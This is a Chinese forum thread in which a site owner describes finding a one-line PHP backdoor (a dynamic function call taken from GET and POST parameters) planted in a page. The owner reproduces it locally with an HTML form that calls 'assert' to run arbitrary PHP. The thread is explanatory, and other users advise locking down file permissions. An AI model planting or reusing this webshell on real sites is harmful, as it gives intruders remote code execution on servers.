某人在我一个页面里留下了这个

miniloop

莫名奇妙就负载奇高，默默地查了一晚上，发现某人在一个php页面里留下了这个

1. @ $_GET['page']($_POST['item']);

复制代码

这不就是传说中的一句话后门么？

======================================
编辑for更新


黑阔厉害啊，尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval，他不可能用，网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html

1. <form action = "test.php?page=assert" method = "post">
   
2.    <input type = "text" name = "item" />
   
3.     <input type = "submit" value = "运行" />
   
4.    </form>

复制代码

复制代码
再建一个test.php

1. <?php $_GET['page']($_POST['item']);  ?>

复制代码

复制代码
这个post.html在任何电脑上运行都可以，只要action的地址是那个test.php.

在输入框里输入： phpinfo(); 点击运行按钮，
尼玛 phpinfo就直接出来啦，太可怕了，这可以为所欲为了啊

dfdfdf.gif (5.61 KB, 下载次数: 3)

2012-2-16 17:41 上传

点击文件名下载附件

dfdfdfttt.gif (12.51 KB, 下载次数: 0)

2012-2-16 17:42 上传

点击文件名下载附件

czc111222

不懂

小晖

楼主v5, 这样也可以查到。

x10

这个真危险啊

hising

学习了

mslxd

php比较自由，所以比较危险

肉鸟

真心看不懂

cquyf

不懂啊

wmfy808

miniloop 发表于 2012-2-17 17:40
传毛文件！

真实情况是那家伙不知从哪个漏洞进来了并在我的member.php这个文件上加了那一句话，test.php是 ...

不给member.php修改权限，只给执行权限，他怎么加进去？安全权限要做好，就不怕了